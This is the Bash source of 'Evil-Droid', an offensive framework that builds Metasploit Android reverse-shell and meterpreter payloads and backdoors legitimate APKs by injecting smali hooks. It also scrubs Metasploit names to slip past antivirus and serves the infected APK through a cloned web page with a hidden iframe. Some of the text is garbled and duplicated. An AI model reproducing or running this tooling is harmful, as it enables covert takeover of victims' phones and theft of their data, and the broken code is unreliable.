Gecko/20100101 Firefox/33.0" > /dev/null 2>&1 } function launcher() { echo '<iframe id="frame" src="evil.apk" application="yes" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no>></iframe><script type="text/javascript">setTimeout(function(){window.location.href="http://local-ip";}, 15000);</script></body></html>' | sed "s|evil.apk|$apk_name.apk|" | sed "s|local-ip|$LHOST/$index.html|" >> apk_index com=`cat apk_index` rep="</body></html>" sed "s|$rep|$com|" $index.html > index2.html mv index2.html /var/www/html/$index.html > /dev/null 2>&1 cp $path/evilapk/$apk_name.apk /var/www/html > /dev/null 2>&1 rm apk_index > /dev/null 2>&1 rm $index.html > /dev/null 2>&1 zenity --title "☢ SITE CLONED ☢" --info --text "http://$LHOST/$index.html" --width 400 > /dev/null 2>&1 } #function attack verctor function atkv() { while true; do echo "" 
atk_v=$(zenity --list --title "☢ EVIL-DROID OPTIONS ☢" --text "Choose an option bellow:" --radiolist --column "Choose" --column "Option" TRUE "Multi-Handler" FALSE "Attack-Vector" FALSE "Main-Menu" FALSE "Exit" --width 305 --height 270 2> /dev/null) case $atk_v in Multi-Handler) listener;suite;; Attack-Vector) clns;spinlong;index_name;launcher;listener;suite;; Main-Menu) clear;main;; Exit) echo -e $yellow "";apache_svc_stop;postgresql_stop;echo " Good Bye !!";echo "";exit;; esac done } #function suite function suite() { while true; do echo "" suit=$(zenity --list --title "☢ EVIL-DROID OPTIONS ☢" --text "Would you like to continue?" --radiolist --column "Choose" --column "Option" TRUE "Main-Menu" FALSE "Exit" --width 305 --height 270 2> /dev/null) case $suit in Main-Menu) clear;main;; Exit) echo -e $yellow "";apache_svc_stop;postgresql_stop;echo " Good Bye !!";echo "";exit;; esac done } #function clean files function clean() { rm $directory/* > /dev/null 2>&1 rm $path/*.jpeg > /dev/null 2>&1 rm $path/*.txt > /dev/null 2>&1 rm /var/www/html/*.apk > /dev/null 2>&1 rm /var/www/html/$index.html > /dev/null 2>&1 } start=$(zenity --question --title="☢ Evil-Droid Framework ☢" --text "Execute framework and Services?" --width 270 2> /dev/null) if [ "$?" 
-eq "0" ]; then apache_svc_start postgresql_start else clear echo "" echo -e $lightgreen "╔──────────────────────────────────────────────╗" echo -e $lightgreen "| Author: Mascerano Bachir |" echo -e $lightgreen "| Evil-Droid Framework $ver - Dev-labs.co |" echo -e $lightgreen "| Credits to : MrPedroubuntu , Kader Achraf |" echo -e $lightgreen "| , youcef yahia |" echo -e $lightgreen "| and Mohammed Yacine |" echo -e $lightgreen "┖──────────────────────────────────────────────┙" echo "" apache_svc_stop postgresql_stop exit fi clear #main menu function main() { while : do print_ascii_art echo -e $green "" echo "╔──────────────────────────────────────────────╗" echo "| Evil-Droid Framework $ver |" echo "| Hack & Remote android plateform |" echo "┖──────────────────────────────────────────────┙" echo "[1] APK MSF " echo "[2] BACKDOOR APK ORIGINAL (OLD) " echo "[3] BACKDOOR APK ORIGINAL (NEW) " echo "[4] BYPASS AV APK (ICON CHANGE) " echo "[5] START LISTENER " echo "[c] CLEAN " echo "[q] QUIT " read -p "[?] 
Select>: " option echo case "$option" in 1) echo -e $lightgreen "[✔] APK MSF" echo -e $green get_lhost get_lport echo payload_name get_payload echo spinlong gen_payload mv $apk_name.apk $path/evilapk > /dev/null 2>&1 error0 sleep 2 echo "" zenity --title "☢ EVIL-DROID ☢" --info --text "APK PAYLOAD : $path/evilapk/$apk_name.apk " --width 400 > /dev/null 2>&1 atkv echo ;; 2) echo -e $lightgreen "[✔] BACKDOOR APK ORIGINAL (OLD)" echo -e $green get_lhost get_lport echo payload_name get_payload echo orig_apk echo spinlong up_apktook embed_payload echo mv $apk_name.apk $path/evilapk > /dev/null 2>&1 error sleep 2 echo "" zenity --title "☢ EVIL-DROID ☢" --info --text "BACKDOORED APK : $path/evilapk/$apk_name.apk " --width 400 > /dev/null 2>&1 atkv echo ;; 3) echo -e $lightgreen "[✔] BACKDOOR APK ORIGINAL (NEW)" echo -e $green get_lhost get_lport echo payload_name get_payload echo orig_apk echo spinlong gen_payload up_apktook apk_decomp1 apk_decomp perms hook_smalies spinlong apk_comp1 sign echo mv $apk_name.apk $path/evilapk > /dev/null 2>&1 error sleep 2 echo "" zenity --title "☢ EVIL-DROID ☢" --info --text "BACKDOORED APK : $path/evilapk/$apk_name.apk " --width 400 > /dev/null 2>&1 atkv echo ;; 4) echo -e $lightgreen "[✔] BYPASS AV APK" echo -e $green get_lhost get_lport echo payload_name get_payload1 echo quests mv $apk_name.apk $path/evilapk > /dev/null 2>&1 error sleep 2 echo zenity --title "☢ EVIL-DROID ☢" --info --text "APK SIGNED : $path/evilapk/$apk_name.apk " --width 400 > /dev/null 2>&1 atkv echo ;; 5) echo -e $lightgreen "[✔] START LISTENER" echo -e $green get_lhost get_lport echo get_payload echo listener suite echo ;; c) echo -e $lightgreen "[✔] clean up all files" echo clean echo zenity --title "☢ EVIL-DROID ☢" --info --text "All Files Are Removed " --width 400 > /dev/null 2>&1 echo clear ;; q) echo -e $yellow " Good Bye !!" 
apache_svc_stop postgresql_stop echo exit 0 ;; *) echo -e $red "【X】 Invalid option, please write a valid number【X】" echo sleep 2 ;; esac done } main
1.) Your description should be a brief summary - Not the entire code block. |
#!/usr/bin/env bash
Evil-Droid Framework . version 0.3
Evil-Droid is a framework that create & generate & embed apk payload to penetrate android platform
Created By Mascerano Bachir .
Website: http://www.dev-labs.co
YTB : https://www.youtube.com/c/mascerano%20bachir
FCB : https://www.facebook.com/kali.linux.pentesting.tutorials
#Special thanks to : MrPedroubuntu , Kader Achraf , youcef yahia and Mohammed Yacine
this is an open source tool if you want to modify or add something . Please give me a copy.
resize terminal window
resize -s 40 70 > /dev/null
#Colors
cyan='\e[0;36m'
lightcyan='\e[96m'
green='\e[0;32m'
lightgreen='\e[1;32m'
white='\e[1;37m'
red='\e[1;31m'
yellow='\e[1;33m'
blue='\e[1;34m'
Escape="\033";
white="${Escape}[0m";
RedF="${Escape}[31m";
GreenF="${Escape}[32m";
LighGreenF="${Escape}[92m"
YellowF="${Escape}[33m";
BlueF="${Escape}[34m";
CyanF="${Escape}[36m";
Reset="${Escape}[0m";
Check root
[[
id -u
-eq 0 ]] > /dev/null 2>&1 || { echo $red "You must be root to run the script"; echo ; exit 1; }clear
check internet
function checkinternet()$yellow " Checking For Internet: $ {RedF}SUCSESS"$yellow " Checking For Internet: $ {LighGreenF}CONNECTED"
{
ping -c 1 baidu.com > /dev/null 2>&1
if [[ "$?" != 0 ]]
then
echo -e
echo
echo -e $red "This Script Needs An Active Internet Connection"
echo
echo -e $red " Enter Evil-Droid "
echo && sleep 2
exit
else
echo -e
fi
}
checkinternet
sleep 2
#Define options
path=
pwd
lanip=
hostname -I
publicip=
dig +short myip.opendns.com @resolver1.opendns.com
ver="v0.3"
APKTOOL="$path/tools/apktool.jar"
VAR1=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # smali dir renaming
VAR2=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # smali dir renaming
VAR3=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # Payload.smali renaming
VAR4=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # Pakage name renaming 1
VAR5=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # Pakage name renaming 2
VAR6=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # Pakage name renaming 3
VAR7=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # New name for word 'payload'
VAR8=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # New name for word 'metasploit'
perms=' \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n '
echo ""
sleep 1
spinner for Metasploit Generator
spinlong ()
{
bar=" +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
barlength=${#bar}
i=0
while ((i < 100)); do
n=$((i*barlength / 100))
printf "\e[00;32m\r[%-${barlength}s]\e[00m" "${bar:0:n}"
((i += RANDOM%5+2))
sleep 0.02
done
}
detect ctrl+c exiting
trap ctrl_c INT
ctrl_c() {
clear
echo -e $red"[] (Ctrl + C ) Detected, Trying To Exit... "
echo -e $red"[] Stopping Services... "
apache_svc_stop
postgresql_stop
sleep 1
echo ""
echo -e $yellow"[*] Thanks For Using Evil-Droid :)"
exit
}
#detect system
echo -e $blue
sudo cat /etc/issue.net
#check dependencies existence
echo -e $blue ""
echo "® Checking dependencies configuration ®"
echo " "
check if metasploit-framework is installed
which msfconsole > /dev/null 2>&1$green "[ ✔ ] Metasploit-Framework..............$ {LighGreenF}[ found ]"$red "[ X ] Metasploit-Framework -> $ {RedF}not found "$green "[ ✔ ] Xterm.............................$ {LighGreenF}[ found ]"$red "[ X ] xterm -> $ {RedF}not found! "$green "[ ✔ ] Zenity............................$ {LighGreenF}[ found ]"$red "[ X ] Zenity -> $ {RedF}not found! "$green "[ ✔ ] Aapt..............................$ {LighGreenF}[ found ]"$red "[ X ] Aapt -> $ {RedF}not found! "$green "[ ✔ ] Apktool...........................$ {LighGreenF}[ found ]"$red "[ X ] Apktool -> $ {RedF}not found! "$green "[ ✔ ] Zipalign..........................$ {LighGreenF}[ found ]"$red "[ X ] Zipalign -> $ {RedF}not found! "
if [ "$?" -eq "0" ]; then
echo -e
which msfconsole > /dev/null 2>&1
sleep 2
else
echo -e
echo -e $yellow "[ ! ] Installing Metasploit-Framework "
sudo apt-get install metasploit-framework -y
echo -e $blue "[ ✔ ] Done installing ...."
which msfconsole > /dev/null 2>&1
sleep 2
fi
#check if xterm is installed
which xterm > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo -e
which xterm > /dev/null 2>&1
sleep 2
else
echo ""
echo -e
sleep 2
echo -e $yellow "[ ! ] Installing Xterm "
sleep 2
echo -e $green ""
sudo apt-get install xterm -y
clear
echo -e $blue "[ ✔ ] Done installing .... "
which xterm > /dev/null 2>&1
fi
#check if zenity is installed
which zenity > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo -e
which zenity > /dev/null 2>&1
sleep 2
else
echo ""
echo -e
sleep 2
echo -e $yellow "[ ! ] Installing Zenity "
sleep 2
echo -e $green ""
sudo apt-get install zenity -y
clear
echo -e $blue "[ ✔ ] Done installing .... "
which zenity > /dev/null 2>&1
fi
#Check for Android Asset Packaging Tool
which aapt > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo -e
which aapt > /dev/null 2>&1
sleep 2
else
echo ""
echo -e
sleep 2
echo -e $yellow "[ ! ] Installing Aapt "
sleep 2
echo -e $green ""
sudo apt-get install aapt -y
sudo apt-get install android-framework-res -y
clear
echo -e $blue "[ ✔ ] Done installing .... "
which aapt > /dev/null 2>&1
fi
#Check for Apktool Reverse Engineering
which apktool > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo -e
which aapt > /dev/null 2>&1
sleep 2
else
echo ""
echo -e
sleep 2
echo -e $yellow "[ ! ] Installing Apktool "
sleep 2
echo -e $green ""
sudo apt-get install apktool -y
clear
echo -e $blue "[ ✔ ] Done installing .... "
which apktool > /dev/null 2>&1
fi
#check for zipalign
which zipalign > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo -e
which aapt > /dev/null 2>&1
sleep 2
else
echo ""
echo -e
sleep 2
echo -e $yellow "[ ! ] Installing Zipalign "
sleep 2
echo -e $green ""
sudo apt-get install zipalign -y
clear
echo -e $blue "[ ✔ ] Done installing .... "
which zipalign > /dev/null 2>&1
fi
directory="$path/evilapk"
if [ ! -d "$directory" ]; then
echo "Creating the output directory..."
mkdir $directory
sleep 3
fi
echo -e $red "╔────────────────────────────────────────────────╗"
echo -e $red "| Evil-Droid Framework $ver - Dev-labs.co |"
echo -e $red "| Please do not upload APK to VirusTotal.com |"
echo -e $red "┖────────────────────────────────────────────────┙"
#function ascii banner
function print_ascii_art {
echo -e $lightgreen " . . "
echo -e $lightgreen " M. .M "
echo -e $lightgreen " MMMMMMMMMMM. "
echo -e $lightgreen " .MMM\MMMMMMM/MMM. "
echo -e $lightgreen " .MMM.7MMMMMMM.7MMM. "
echo -e $lightgreen " .MMMMMMMMMMMMMMMMMMM "
echo -e $lightgreen " MMMMMMM.......MMMMMMM "
echo -e $lightgreen " MMMMMMMMMMMMMMMMMMMMM "
echo -e $lightgreen " MMMM MMMMMMMMMMMMMMMMMMMMM MMMM "
echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "
echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "
echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "
echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "
echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "
echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "
echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "
echo -e $lightgreen " MMM8 MMMMMMMMMMMMMMMMMMMMM 8MMM "
echo -e $lightgreen " MMMMMMMMMMMMMMMMMMMMM "
echo -e $lightgreen " MMMMMMMMMMMMMMMMMMMMM "
echo -e $lightgreen " MMMMM MMMMM $ver "
echo -e $lightgreen " MMMMM MMMMM "
echo -e $lightgreen " MMMMM MMMMM "
echo -e $lightgreen " MMMMM MMMMM "
echo -e $lightgreen " .MMM. .MMM. "
echo -e $lightgreen " Mascerano Bachir - Dev-labs "
}
#function lhost
function get_lhost()
{
LHOST=$(zenity --title="☢ SET LHOST ☢" --text "Your-Local-ip: $lanip ; Your-Public-ip: $publicip" --entry-text "$lanip" --entry --width 300 2> /dev/null)
}
#function lport
function get_lport()
{
LPORT=$(zenity --title="☢ SET LPORT ☢" --text "example: 4444" --entry-text "4444" --entry --width 300 2> /dev/null)
}
#function payload
function get_payload()
{
PAYLOAD=$(zenity --list --title "☢ EVIL-DROID ☢" --text "\nChose payload option:" --radiolist --column "Choose" --column "Option" TRUE "android/shell/reverse_tcp" FALSE "android/shell/reverse_http" FALSE "android/shell/reverse_https" FALSE "android/meterpreter/reverse_tcp" FALSE "android/meterpreter/reverse_http" FALSE "android/meterpreter/reverse_https" FALSE "android/meterpreter_reverse_tcp" FALSE "android/meterpreter_reverse_http" FALSE "android/meterpreter_reverse_https" --width 400 --height 400 2> /dev/null)
}
function get_payload1()
{
PAYLOAD=$(zenity --list --title "☢ EVIL-DROID ☢" --text "\nChose payload option:" --radiolist --column "Choose" --column "Option" TRUE "android/shell/reverse_tcp" FALSE "android/shell/reverse_http" FALSE "android/shell/reverse_https" FALSE "android/meterpreter/reverse_tcp" FALSE "android/meterpreter/reverse_http" FALSE "android/meterpreter/reverse_https" --width 400 --height 400 2> /dev/null)
}
#function name
function payload_name()
{
apk_name=$(zenity --title "☢ PAYLOAD NAME ☢" --text "example: evilapk" --entry --entry-text "evilapk" --width 300 2> /dev/null)
}
#function original apk
function orig_apk()
{
orig=$(zenity --title "☢ ORIGINAL APK ☢" --filename=$path --file-selection --file-filter ".apk" --text "chose the original (apk)" 2> /dev/null)
}
#function change icon
function change_icon()
{
iconos=$(zenity --title "☢ CHOOSE ICON ☢" --filename=$path --file-selection --file-filter ".png" --text "chose your own icon." 2> /dev/null)
}
#function generate payload
function gen_payload()
{
echo -e $yellow ""
echo "[] Generating apk payload"
spinlong
xterm -T " GENERATE APK PAYLOAD" -e msfvenom -p $PAYLOAD LHOST=$LHOST LPORT=$LPORT -a dalvik --platform android R -o $apk_name.apk > /dev/null 2>&1
}
function embed_payload()
{
echo -e $yellow ""
echo "[] Embeding apk payload in orginal apk"
spinlong
xterm -T " EMBED APK PAYLOAD" -e msfvenom -x $orig -p $PAYLOAD LHOST=$LHOST LPORT=$LPORT -a dalvik --platform android R -o $apk_name.apk > /dev/null 2>&1
}
#function update apktool
function up_apktook()
{
echo -e $yellow ""
echo "[] Removing 1.apk framework file..."
spinlong
apktool empty-framework-dir --force > /dev/null 2>&1
}
#function apktool
function apk_decomp()
{
echo -e $yellow ""
echo "[] Decompiling Payload APK..."
spinlong
xterm -T "Decompiling Payload" -e java -jar $APKTOOL d -f -o $path/payload $path/$apk_name.apk > /dev/null 2>&1
rm $apk_name.apk
}
function apk_comp()
{
echo -e $yellow ""
echo "[] Rebuilding APK file..."
spinlong
xterm -T "Rebuilding APK" -e java -jar $APKTOOL b $path/payload -o evil.apk > /dev/null 2>&1
rm -r payload > /dev/null 2>&1
}
function apk_decomp1()
{
echo -e $yellow ""
echo "[] Decompiling Original APK..."
spinlong
xterm -T "Decompiling Original" -e java -jar $APKTOOL d -f -o $path/original $orig > /dev/null 2>&1
}
function apk_comp1()
{
echo -e $yellow ""
echo "[*] Rebuilding Backdoored APK..."
spinlong
xterm -T "Rebuilding APK" -e java -jar $APKTOOL b $path/original -o evil.apk > /dev/null 2>&1
rm -r payload > /dev/null 2>&1
rm -r original > /dev/null 2>&1
}
#function errors
function error()
{
rc=$?
if [ $rc != 0 ]; then
echo -e $red ""
echo "【X】 Failed to rebuild backdoored apk【X】"
echo
apache_svc_stop
postgresql_stop
exit $rc
fi
}
function error0()
{
rc=$?
if [ $rc != 0 ]; then
echo -e $red ""
echo "【X】 An Error Was Occured .Ty Again【X】"
echo
apache_svc_stop
postgresql_stop
exit $rc
fi
}
#function apache2 service
function apache_svc_start()
{
service apache2 start | zenity --progress --pulsate --title "PLEASE WAIT..." --text="Start apache2 service" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
}
function apache_svc_stop()
{
service apache2 stop | zenity --progress --pulsate --title "PLEASE WAIT..." --text="Stop apache2 service" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
}
#function postgresql service
function postgresql_start()
{
service postgresql start | zenity --progress --pulsate --title "PLEASE WAIT..." --text="Start postgresql service" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
}
function postgresql_stop()
{
service postgresql stop | zenity --progress --pulsate --title "PLEASE WAIT..." --text="Stop postgresql service" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
}
function adding permission
function perms()
{
echo -e $yellow ""
echo "[] Adding permission and Hook Smali"
spinlong
package_name=
head -n 2 $path/original/AndroidManifest.xml|grep "<manifest"|grep -o -P 'package="[^\"]+"'|sed 's/\"//g'|sed 's/package=//g'|sed 's/\./\//g'
2>&1package_dash=
head -n 2 $path/original/AndroidManifest.xml|grep "<manifest"|grep -o -P 'package="[^\"]+"'|sed 's/\"//g'|sed 's/package=//g'|sed 's/\./\//g'|sed 's|/|.|g'
2>&1tmp=$package_name
sed -i "5i\ $perms" $path/original/AndroidManifest.xml
rm $path/payload/smali/com/metasploit/stage/MainActivity.smali 2>&1
sed -i "s|Lcom/metasploit|L$package_name|g" $path/payload/smali/com/metasploit/stage/.smali 2>&1
cp -r $path/payload/smali/com/metasploit/stage $path/original/smali/$package_name > /dev/null 2>&1
rc=$?
if [ $rc != 0 ];then
app_name=
grep "<application" $path/original/AndroidManifest.xml|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'|sed 's%/[^/]*$%%'
2>&1app_dash=
grep "<application" $path/original/AndroidManifest.xml|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'|sed 's|/|.|g'|sed 's%.[^.]*$%%'
2>&1tmp=$app_name
sed -i "s|L$package_name|L$app_name|g" $path/payload/smali/com/metasploit/stage/*.smali 2>&1
cp -r $path/payload/smali/com/metasploit/stage $path/original/smali/$app_name > /dev/null 2>&1
amanifest=" "
boot_cmp=' \n \n \n \n '
sed -i "s|$amanifest|$boot_cmp|g" $path/original/AndroidManifest.xml 2>&1
fi
amanifest=" "
boot_cmp=' \n \n \n \n '
sed -i "s|$amanifest|$boot_cmp|g" $path/original/AndroidManifest.xml 2>&1
android_nam=$tmp
}
functions hook smali
function hook_smalies()
{
launcher_line_num=
grep -n "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml |awk -F ":" 'NR==1{ print $1 }'
2>&1android_name=
grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<application"|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'
2>&1android_activity=
grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<activity"|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'
2>&1android_targetActivity=
grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<activity"|grep -m1 ""|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'
2>&1if [ $android_name ]; then
echo
echo "##################################################################"
echo "inject Smali: $android_name.smali" |awk -F ":/" '{ print $NF }'
hook_num=
grep -n " return-void" $path/original/smali/$android_name.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'
2>&1echo "In line:$hook_num"
echo "##################################################################"
starter=" invoke-static {}, L$android_nam/stage/MainService;->start()V"
sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_name.smali > /dev/null 2>&1
elif [ ! -e $android_activity ]; then
echo
echo "##################################################################"
echo "inject Smali: $android_activity.smali" |awk -F ":/" '{ print $NF }'
hook_num=
grep -n " return-void" $path/original/smali/$android_activity.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'
2>&1echo "In line:$hook_num"
echo "##################################################################"
starter=" invoke-static {}, L$android_nam/stage/MainService;->start()V"
sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_activity.smali > /dev/null 2>&1
rc=$?
if [ $rc != 0 ]; then
spinlong
echo -e $red ""
echo "[x] cant find : $android_activity.smali"
echo "[] try another ..."
spinlong
sleep 2
echo
echo "##################################################################"
echo "inject Smali: $android_targetActivity.smali" |awk -F ":/" '{ print $NF }'
hook_num=
grep -n " return-void" $path/original/smali/$android_targetActivity.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'
2>&1echo "In line:$hook_num"
echo "##################################################################"
starter=" invoke-static {}, L$android_nam/stage/MainService;->start()V"
sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_targetActivity.smali > /dev/null 2>&1
fi
fi
}
#function flagged by av & updating smalies
function flagg()
{
echo -e $yellow ""
echo "[] Scrubbing the payload contents to avoid AV signatures..."
spinlong
mv payload/smali/com/metasploit payload/smali/com/$VAR1
mv payload/smali/com/$VAR1/stage payload/smali/com/$VAR1/$VAR2
mv payload/smali/com/$VAR1/$VAR2/Payload.smali payload/smali/com/$VAR1/$VAR2/$VAR3.smali
sleep 2
if [ -f payload/smali/com/$VAR1/$VAR2/PayloadTrustManager.smali ]; then
echo
echo -e $red "[ X ] an error was occured . Please upgrade your distro .."
apache_svc_stop
postgresql_stop
exit 1
fi
sed -i "s#/metasploit/stage#/$VAR1/$VAR2#g" payload/smali/com/$VAR1/$VAR2/*
sed -i "s#Payload#$VAR3#g" payload/smali/com/$VAR1/$VAR2/*
sed -i "s#com.metasploit.meterpreter.AndroidMeterpreter#com.$VAR4.$VAR5.$VAR6#" payload/smali/com/$VAR1/$VAR2/$VAR3.smali
sed -i "s#payload#$VAR7#g" payload/smali/com/$VAR1/$VAR2/$VAR3.smali
sed -i "s#com.metasploit.stage#com.$VAR1.$VAR2#" payload/AndroidManifest.xml
sed -i "s#metasploit#$VAR8#" payload/AndroidManifest.xml
sed -i "s#MainActivity#$apk_name#" payload/res/values/strings.xml
sed -i '/.SET_WALLPAPER/d' payload/AndroidManifest.xml
sed -i '/WRITE_SMS/a' payload/AndroidManifest.xml
}
function flagg_original()
{
echo -e $yellow ""
echo "[] Scrubbing the payload contents to avoid AV signatures..."
spinlong
rm $path/payload/smali/com/metasploit/stage/MainActivity.smali 2>&1
mv payload/smali/com/metasploit/stage payload/smali/com/metasploit/$VAR1
mv payload/smali/com/metasploit/$VAR1/MainBroadcastReceiver.smali payload/smali/com/metasploit/$VAR1/$VAR2.smali
mv payload/smali/com/metasploit/$VAR1/MainService.smali payload/smali/com/metasploit/$VAR1/$VAR3.smali
mv payload/smali/com/metasploit/$VAR1/Payload.smali payload/smali/com/metasploit/$VAR1/$VAR4.smali
sleep 2
if [ -f payload/smali/com/metasploit/$VAR1/PayloadTrustManager.smali ]; then
echo
echo -e $red "[ X ] an error was occured . Please upgrade your distro .."
apache_svc_stop
postgresql_stop
exit 1
fi
echo -e $yellow ""
echo "[] Adding permission and Hook Smali"
spinlong
sed -i "5i\ $perms" $path/original/AndroidManifest.xml
package_name=
head -n 2 $path/original/AndroidManifest.xml|grep "<manifest"|grep -o -P 'package="[^\"]+"'|sed 's/\"//g'|sed 's/package=//g'|sed 's/\./\//g'
2>&1package_dash=
head -n 2 $path/original/AndroidManifest.xml|grep "<manifest"|grep -o -P 'package="[^\"]+"'|sed 's/\"//g'|sed 's/package=//g'|sed 's/\./\//g'|sed 's|/|.|g'
2>&1tmp=$package_name
sed -i "s|Lcom/metasploit/stage|L$package_name/$VAR1|g" $path/payload/smali/com/metasploit/$VAR1/.smali 2>&1
sed -i "s|L$package_name/$VAR1/Payload|L$package_name/$VAR1/$VAR4|g" $path/payload/smali/com/metasploit/$VAR1/.smali 2>&1
sed -i "s|L$package_name/$VAR1/MainService|L$package_name/$VAR1/$VAR3|g" $path/payload/smali/com/metasploit/$VAR1/.smali 2>&1
sed -i "s|L$package_name/$VAR1/MainBroadcastReceiver|L$package_name/$VAR1/$VAR2|g" $path/payload/smali/com/metasploit/$VAR1/.smali 2>&1
cp -r $path/payload/smali/com/metasploit/$VAR1 $path/original/smali/$package_name > /dev/null 2>&1
rc=$?
if [ $rc != 0 ];then
app_name=
grep "<application" $path/original/AndroidManifest.xml|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'|sed 's%/[^/]*$%%'
2>&1app_dash=
grep "<application" $path/original/AndroidManifest.xml|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'|sed 's|/|.|g'|sed 's%.[^.]*$%%'
2>&1tmp=$app_name
sed -i "s|L$package_name/$VAR1|L$app_name/$VAR1|g" $path/payload/smali/com/metasploit/$VAR1/.smali 2>&1
sed -i "s|L$app_name/$VAR1/$VAR4|L$app_name/$VAR1/$VAR4|g" $path/payload/smali/com/metasploit/$VAR1/.smali 2>&1
sed -i "s|L$app_name/$VAR1/$VAR3|L$app_name/$VAR1/$VAR3|g" $path/payload/smali/com/metasploit/$VAR1/.smali 2>&1
sed -i "s|L$app_name/$VAR1/$VAR2|L$app_name/$VAR1/$VAR2|g" $path/payload/smali/com/metasploit/$VAR1/.smali 2>&1
cp -r $path/payload/smali/com/metasploit/$VAR1 $path/original/smali/$app_name > /dev/null 2>&1
amanifest=" "
boot_cmp=' \n \n \n \n '
sed -i "s|$amanifest|$boot_cmp|g" $path/original/AndroidManifest.xml 2>&1
fi
amanifest=" "
boot_cmp=' \n \n \n \n '
sed -i "s|$amanifest|$boot_cmp|g" $path/original/AndroidManifest.xml 2>&1
android_nam=$tmp
launcher_line_num=
grep -n "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml |awk -F ":" 'NR==1{ print $1 }'
2>&1android_name=
grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<application"|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'
2>&1android_activity=
grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<activity"|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'
2>&1android_targetActivity=
grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<activity"|grep -m1 ""|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'
2>&1if [ $android_name ]; then
echo
echo "##################################################################"
echo "inject Smali: $android_name.smali" |awk -F ":/" '{ print $NF }'
hook_num=
grep -n " return-void" $path/original/smali/$android_name.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'
2>&1echo "In line:$hook_num"
echo "##################################################################"
starter=" invoke-static {}, L$android_nam/$VAR1/$VAR3;->start()V"
sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_name.smali > /dev/null 2>&1
elif [ ! -e $android_activity ]; then
echo
echo "##################################################################"
echo "inject Smali: $android_activity.smali" |awk -F ":/" '{ print $NF }'
hook_num=
grep -n " return-void" $path/original/smali/$android_activity.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'
2>&1echo "In line:$hook_num"
echo "##################################################################"
starter=" invoke-static {}, L$android_nam/$VAR1/$VAR3;->start()V"
sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_activity.smali > /dev/null 2>&1
rc=$?
if [ $rc != 0 ]; then
spinlong
echo -e $red ""
echo "[x] cant find : $android_activity.smali"
echo "[*] try another ..."
spinlong
sleep 2
echo
echo "##################################################################"
